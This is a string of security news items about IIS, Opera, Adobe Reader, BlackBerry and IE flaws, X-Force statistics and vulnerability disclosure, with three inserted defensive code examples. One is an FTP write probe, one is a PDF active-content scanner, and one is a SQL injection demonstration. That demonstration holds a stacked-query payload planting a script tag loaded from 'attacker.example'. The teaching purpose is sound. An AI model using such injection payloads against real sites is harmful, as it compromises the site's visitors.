Microsoft on Monday said it is looking into a report of a flaw in some versions of its Internet Information Services product that could allow an attacker to gain control of a system.
In a statement, a Microsoft representative said the company "is investigating new public claims of a possible vulnerability in IIS 5 and IIS 6 File Transfer Protocol (FTP)."
Microsoft said it is not aware of any attacks using the vulnerability. "We will take steps to determine how customers can protect themselves, should we confirm the vulnerability."
According to IDG News Service, code for exploiting the unpatched flaw was posted to the Milw0rm Web site. IDG said the exploit appears to affect primarily older versions of IIS--and only when the FTP function is enabled.
Once it is done with its investigation, Microsoft said, it will decide how to address the matter, which could include a security update as part of its monthly Patch Tuesday or an out-of-cycle update.
In a posting on Monday, the U.S. Computer Emergency Readiness Team (US-CERT) suggested IT administrators "disable anonymous write access to the FTP server to help mitigate the vulnerability" but added that "a proper impact analysis should be performed prior to taking defensive measures."
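US-CERT's mitigation is a configuration change, and the check an administrator wants afterwards is whether an anonymous session can still write. The script below is an added example, not part of the article or of US-CERT's posting: it logs in as anonymous with Python's standard ftplib, tries to create a directory with a random name, and removes it again if the server accepted it. The host name, the anonymous password and the probe directory name are assumptions for illustration; the `FakeFtp` class is a constructed stand-in so the check can run without a server.

```python
"""Probe an FTP server for anonymous write access (added example)."""
import ftplib
import uuid


def anonymous_write_allowed(ftp):
    """Return True if the current session can create a directory.

    `ftp` is an ftplib.FTP-style object (mkd/rmd raising ftplib.error_perm
    on refusal). A random probe name avoids touching real data; if the
    server accepts the write, the probe is removed so nothing is left behind.
    """
    probe = "write-probe-" + uuid.uuid4().hex  # assumed harmless name
    try:
        ftp.mkd(probe)
    except ftplib.error_perm:
        return False
    try:
        ftp.rmd(probe)
    except ftplib.error_perm:
        pass  # writable but not deletable: still a finding, report it
    return True


def check_server(host, timeout=10):
    """Log in anonymously and report whether the server is writable."""
    ftp = ftplib.FTP(timeout=timeout)
    ftp.connect(host, 21)
    try:
        ftp.login("anonymous", "probe@example.com")  # assumed e-mail password
    except ftplib.error_perm:
        ftp.close()
        return "anonymous login refused"
    try:
        if anonymous_write_allowed(ftp):
            return "anonymous WRITE allowed: apply the US-CERT mitigation"
        return "anonymous access is read-only"
    finally:
        ftp.quit()


class FakeFtp:
    """Constructed stand-in for ftplib.FTP so the check runs offline."""

    def __init__(self, writable):
        self.writable = writable
        self.dirs = set()

    def mkd(self, name):
        if not self.writable:
            raise ftplib.error_perm("550 Access is denied.")
        self.dirs.add(name)
        return name

    def rmd(self, name):
        self.dirs.discard(name)
        return "250 RMD command successful."


if __name__ == "__main__":
    print(anonymous_write_allowed(FakeFtp(writable=True)))   # True
    print(anonymous_write_allowed(FakeFtp(writable=False)))  # False
```

Against a real server, call `check_server("ftp.example.org")` from a host that is allowed to reach it; run it only against systems you are authorized to test.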
There is an old saying in the security world stating that people are the weakest link in the security chain. Here is a bit of data that reinforces this ancient security adage.
ESG Research recently conducted a project focused on confidential data security that will be published soon. However, here are some interesting advance results that support this venerable security dictum. ESG asked 308 North American and European security professionals from large organizations (i.e. 1,000 employees or more) a number of questions about data security risks, policies, and technology safeguards. When asked to define the most important measures for protecting confidential data, nearly half of all respondents said "communicating and training users on confidential data security policies." This was the top response, followed by "physical security" and "access controls for private data."
Now here's the scary part. When asked to rate their organization's performance with regard to "communicating and training users on confidential data security policies," more than one-fourth of security professionals gave their organization a rating of either "fair" or "poor." In other words, many organizations aren't doing a good job in the most important aspect of data privacy and security: communicating with and training employees. Yikes!
This problem appears to be more acute in Europe than North America. In North America, "only" 24 percent of security professionals responded either "fair" or "poor," while in Europe, the number increased to 38 percent. The problem is also more pronounced in the public sector where 34 percent of security professionals gave their organization a "fair" or "poor" rating. Finally, there is also a correlation with organizational size as larger firms do a better job at "communicating and training users on confidential data security policies" than smaller ones.
To me, the message is clear and frightening. The "people" part of information security (i.e. the most important part) is being minimized or managed very poorly. No wonder there are so many breaches! If this problem isn't addressed, we may as well give up. You could invest $1 billion in security technologies but if your people don't know about or understand the problem, you may as well leave the corporate networks wide open.
Opera on Tuesday released a critical security update, designed to fix vulnerabilities in its browser that could allow malicious attackers to use an altered JPEG to take control of a user's system.
The update for Opera version 9.64 is designed to address security vulnerabilities in earlier versions of Opera 9.
The vulnerabilities were found in Opera's plug-ins, which when exploited via a maliciously crafted JPEG image could cause Opera to corrupt memory and crash, potentially resulting in execution of arbitrary code and cross-site scripting, Opera noted in its advisory.
Security software company Secunia rates the vulnerabilities as "highly critical."
Update at 8:45 a.m. PST: Information from security firm Symantec added.
Attackers are making the rounds and exploiting a critical security flaw in Adobe Reader 9 and Acrobat 9.
Earlier versions of the PDF-related software are also affected by the critical security flaw, which could cause the applications to crash and potentially let an attacker gain control of a person's computer, Adobe Systems warned Thursday.
Reports also surfaced that attackers have developed an exploit and are taking advantage of the flaw, the company said.
Adobe has yet to develop an update to address the vulnerability but noted it expects to have one ready for Adobe Reader 9 and Acrobat 9 by March 11. After that, the company expects to launch updates for the earlier versions of the software going back to Adobe Reader 7 and Acrobat 7.
Until then, Adobe advises, people should update their virus definitions and exercise caution when opening documents from unknown sources.
Security company McAfee noted in a blog that the current attacks appear to be targeted ones but that it expects new variants of the exploit to make the rounds as more information becomes public.
In its posting, McAfee said that malicious PDF documents began to surface at the start of the year, exploiting a vulnerability in Adobe Reader versions 8 and 9. The attackers take advantage of a bug in Reader to overwrite memory and gain control of executing code. After that, attackers can install a Trojan horse and from there add a proverbial backdoor to a person's computer to remotely control and monitor the infected system.
Symantec, meanwhile, reports seeing the exploit used against only a few government agencies and large corporations, and within those organizations, only a few people are targeted, said Kevin Haley, a Symantec Security Response director.
"We've seen it used in only a few small places, so it tells us it's a targeted attack and someone is not trying to use it in a widespread way," Haley said, noting fewer than 100 people have been affected since Symantec noticed the attacks on February 12.
But he added it seems likely other attackers may try to exploit the Adobe vulnerabilities and that the range of exploits may grow beyond the malware that Symantec calls Trojan.Pidief.E.
In its blog on Trojan.Pidief.E, Symantec advises users to consider disabling JavaScript in Adobe Reader and has provided instructions in a blog on a different issue.
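Disabling JavaScript in Reader cuts off the most common trigger for these documents, but a mail gateway or analyst also wants to see which PDFs carry it before anyone opens them. The scanner below is an added example, not code from Adobe, McAfee or Symantec. It reads raw PDF syntax for the names that malicious PDFs of this kind rely on (/JavaScript, /JS, /OpenAction, /AA, /Launch, /EmbeddedFile), after undoing the `#HH` escaping that PDF permits in name objects and that is routinely used to hide `/JavaScript` from naive pattern matching. It does not inflate compressed streams, so an empty result is not proof that a file is clean. The sample PDF bytes are constructed for the demonstration.

```python
"""Flag risky PDF name objects, including #HH-escaped ones (added example)."""
import re

# PDF name objects may encode any byte as #HH, e.g. /J#61vaScript == /JavaScript.
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Names associated with active content in malicious PDFs (this list is
# the author's selection for the example, not a complete catalogue).
RISKY_NAMES = {
    b"/JavaScript": "embedded JavaScript",
    b"/JS": "JavaScript action",
    b"/OpenAction": "action executed when the document opens",
    b"/AA": "additional (automatic) actions",
    b"/Launch": "launch action that runs an external program",
    b"/EmbeddedFile": "embedded file attachment",
}

# A PDF name ends at whitespace, a delimiter, or end of input, so /JS
# must not match inside a longer name such as /JSX.
_DELIM = rb"(?![^\s()<>\[\]{}/%])"


def normalize_names(data: bytes) -> bytes:
    """Replace #HH escapes with the byte they encode."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Return {name: occurrence count} for every risky name present."""
    text = normalize_names(data)
    found = {}
    for name in RISKY_NAMES:
        count = len(re.findall(re.escape(name) + _DELIM, text))
        if count:
            found[name.decode("ascii")] = count
    return found


def describe(found: dict) -> str:
    """Human-readable verdict for a scan_pdf() result."""
    if not found:
        return "no risky names found (compressed streams not inspected)"
    parts = [f"{n} x{c}: {RISKY_NAMES[n.encode()]}" for n, c in found.items()]
    return "SUSPICIOUS: " + "; ".join(parts)


# Constructed sample: a catalog with an OpenAction that runs escaped JavaScript,
# plus a decoy /JSX name that a careless /JS match would count.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.alert('hi')) >> endobj\n"
    b"4 0 obj << /Type /JSX >> endobj\n"
    b"%%EOF\n"
)

CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(describe(scan_pdf(SAMPLE_PDF)))
    print(describe(scan_pdf(CLEAN_PDF)))
```

For real files, read the bytes with `open(path, "rb").read()` and pass them to `scan_pdf`; to look inside `/FlateDecode` streams, inflate them with `zlib` first and scan the result with the same function.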
More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.
Vendors with the most vulnerabilities disclosed in 2008.
(Credit: IBM X-Force)
Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.
Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.
Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent), and Turkey (7.8 percent), although the spam senders could be located in a different location, the report says.
China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.
Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.
Two main trends attackers used last year were SQL injection attacks, in which attacker-supplied input is folded into a database query so that the database ends up storing a small malicious script that the Web site then serves to its visitors, and malicious URLs hosting exploits.
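The mass SQL injection campaigns the report describes worked by appending a second statement to a query built from user input, so that every row a site later rendered carried an injected script tag. The code below is an added example, not from the X-Force report, using Python's standard sqlite3 module. The `pages` table, the `attacker.example` host and the payload are constructed for the demonstration. Because sqlite3's `execute()` refuses stacked statements, the vulnerable path uses `executescript()` to model a database driver that accepts them, as the drivers behind the 2008 campaigns did.

```python
"""SQL injection by string concatenation vs. a parameterized query (added example)."""
import sqlite3


def fresh_db():
    """Constructed sample schema: a CMS that renders page bodies as HTML."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages (title, body) VALUES ('Home', 'Welcome');
        INSERT INTO pages (title, body) VALUES ('About', 'Company info');
        """
    )
    return conn


def lookup_vulnerable(conn, title):
    """Builds SQL by concatenation; the input becomes part of the statement.

    executescript() stands in for a driver that runs stacked statements, so
    whatever the attacker appends after a ';' is executed too.
    """
    sql = "SELECT body FROM pages WHERE title = '" + title + "'"
    conn.executescript(sql)


def lookup_safe(conn, title):
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    rows = conn.execute("SELECT body FROM pages WHERE title = ?", (title,))
    return [row[0] for row in rows]


def injected_rows(conn):
    """How many page bodies now carry a script tag (what a visitor would get)."""
    row = conn.execute(
        "SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'"
    ).fetchone()
    return row[0]


# Constructed payload in the style of the 2008 mass-injection attacks: closes
# the string, appends an UPDATE that plants a script tag in every row, and
# comments out the rest of the original statement.
PAYLOAD = (
    "x'; UPDATE pages SET body = body || "
    "'<script src=\"http://attacker.example/evil.js\"></script>'; --"
)

if __name__ == "__main__":
    db = fresh_db()
    lookup_vulnerable(db, PAYLOAD)
    print("vulnerable path, rows carrying script:", injected_rows(db))  # 2

    db = fresh_db()
    print("safe path returns:", lookup_safe(db, PAYLOAD))  # []
    print("safe path, rows carrying script:", injected_rows(db))  # 0
```

The difference is not in input filtering but in where the input ends up: in `lookup_safe` the payload is only ever compared against `title`, so no amount of quoting tricks changes the statement that runs.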
The operating systems with the most vulnerability disclosures in 2008.
(Credit: IBM X-Force)
Updated 2:25 p.m. PST to add that the report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.
Research In Motion issued on Monday interim patches to address critical security flaws in BlackBerry software.
The flaws affect BlackBerry Enterprise Server software version 4.1 Service Pack 3 through Service Pack 6. The BlackBerry Professional Software 4.1 Service Pack 4 is also affected, RIM notes in its security advisory.
RIM is asking corporate customers to install an interim patch for the BlackBerry Enterprise Server and an interim patch for the BlackBerry Professional Software.
RIM also advises BlackBerry users to open PDF attachments only from "trusted sources." The company notes in its security advisory:
Multiple security vulnerabilities exist in the PDF distiller of some released versions of the BlackBerry Attachment Service. These vulnerabilities could enable a malicious individual to send an email message containing a specially crafted PDF file, which when opened for viewing on a BlackBerry smartphone, could cause memory corruption and possibly lead to arbitrary code execution on the computer that hosts the BlackBerry Attachment Service.
Such security flaws will do little to bolster President-elect Barack Obama's hopes for keeping his BlackBerry while in the White House.
Microsoft released a critical security patch on Wednesday to plug vulnerabilities in Internet Explorer, a move that comes amid malicious attackers taking advantage of the security flaws.
The patch is designed to prevent attackers from downloading malware onto users' computers if they visit a malicious Web site, or a legitimate Web site that has been infected.
This zero-day exploit has been in circulation since the first week of December and potentially could have infected a wide swath of users.
The vulnerabilities are found in not only IE 7, Microsoft's latest browser, but also Internet Explorer 5.01, Internet Explorer 6, and Internet Explorer 6 Service Pack 1.
There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.
But two recent examples of cooperation between researchers and vendors show hope for future truces.
Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned security software vendors about a fatal flaw in the DNS (Domain Name System) months before going public so vendors could release patches.
"What he and others he took into his confidence did over the last few months was not only responsible but extraordinary," my colleague Robert Vamosi wrote in a column about Kaminsky's unprecedented disclosure restraint.
This week, security researchers Robert "RSnake" Hansen and Jeremiah Grossman agreed to withdraw their presentation on a new Web attack they dubbed "Clickjacking" from an upcoming OWASP USA security conference in New York at Adobe Systems' request. Now, Adobe can create a patch for one of its applications before the researchers release proof-of-concept code for the vulnerability, which would allow an attacker to take over the microphone, Webcam, and audio on a computer, according to a report on the Dark Reading site on Tuesday. (Oddly, the vulnerability is actually due to an architectural issue in Internet Explorer, the researchers say.)
"I've always had this philosophy. If you find a mediocre to bad vulnerability, it's better to just talk about it, get it out in the open, and let the world see it," RSnake wrote in a first-person account of the situation on Dark Reading. "However, I've always told myself if I found something like a complete remote desktop compromise or something equally bad, that I'd let the vendors know. The last thing I want to do is spawn a botnet army based on my research. There's a big difference between educating the community about a problem and empowering bad guys."
Most of the researcher-vendor conflict comes down to a matter of timing. Vendors tend to want researchers to keep mum until a fix is ready. And researchers want to go public sooner rather than later so that people relying on those products will know they are at risk. Also, going public can serve to motivate a vendor who might be dragging their feet on acknowledging and fixing the problem.
In 2002, Hewlett-Packard threatened to sue researchers who had publicized a vulnerability in the company's Tru64 Unix operating system. The case was notable in that it was the first time the Digital Millennium Copyright Act had been invoked to stifle research related to computer security.
Previously, the DMCA had been used to prosecute or threaten researchers who had discovered ways to break copyright protections. For instance, Russian programmer Dmitry Sklyarov went to jail in 2001 after Adobe convinced the Justice Department that he had violated the DMCA by breaking e-book protections, but he was later released. And Princeton University professor Edward Felten and his students withdrew a paper on how to break e-music protections after being threatened by the recording industry.
In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn just hours after he gave a presentation at Defcon about how attackers could take over Cisco routers. That case was ultimately settled.
These threats and legal actions are unnecessary. Kaminsky, Hansen, and Grossman have shown that there can be compromise. That's a good lesson for three MIT students who pulled a talk at Defcon this summer on hacking the Massachusetts subway system, and for the transit officials who hauled them into court.
In 2004, a video circulated on the Internet showing how a standard Bic pen could be used to open the U-shaped Kryptonite bike lock. The company recalled the locks, replaced newer purchases, and changed the design for new locks. Problem solved, right?
Not exactly. Despite the fact that the problem had been revealed 12 years earlier in a British bike magazine, Kryptonite had continued to sell the locks unchanged. Angry customers filed a class action lawsuit that was settled in 2005, with Kryptonite offering to replace all affected locks or provide vouchers, and compensate people whose bicycles were stolen as a result of the lock being picked.
"If you don't make the problems public, the companies don't fix them and the consumers buy shoddy stuff," said Bruce Schneier, chief security technology officer at BT.
Bruce Schneier is chief security technology officer at BT.
(Credit: Schneier.com)
There's been plenty written about breaking into the virtual locks that safeguard sensitive data on the Web. But the picking of real-world physical locks is becoming an increasingly popular pastime for some. Enthusiasts have formed sporting clubs and hold regular competitions. Security researchers write books about how locks can be broken into and show how it's done on blogs and videos and at security conferences.
Naturally, lock manufacturers aren't happy. They argue that publicizing the vulnerabilities causes people to panic unnecessarily and puts the public at risk by giving criminals information they can use to break door locks, safes, and other secured assets.
But, just like third-party disclosure of vulnerabilities in software forces manufacturers to acknowledge security holes and patch them quickly, lock manufacturers will find they can't escape the scrutiny and will have to be held accountable for their products, experts say.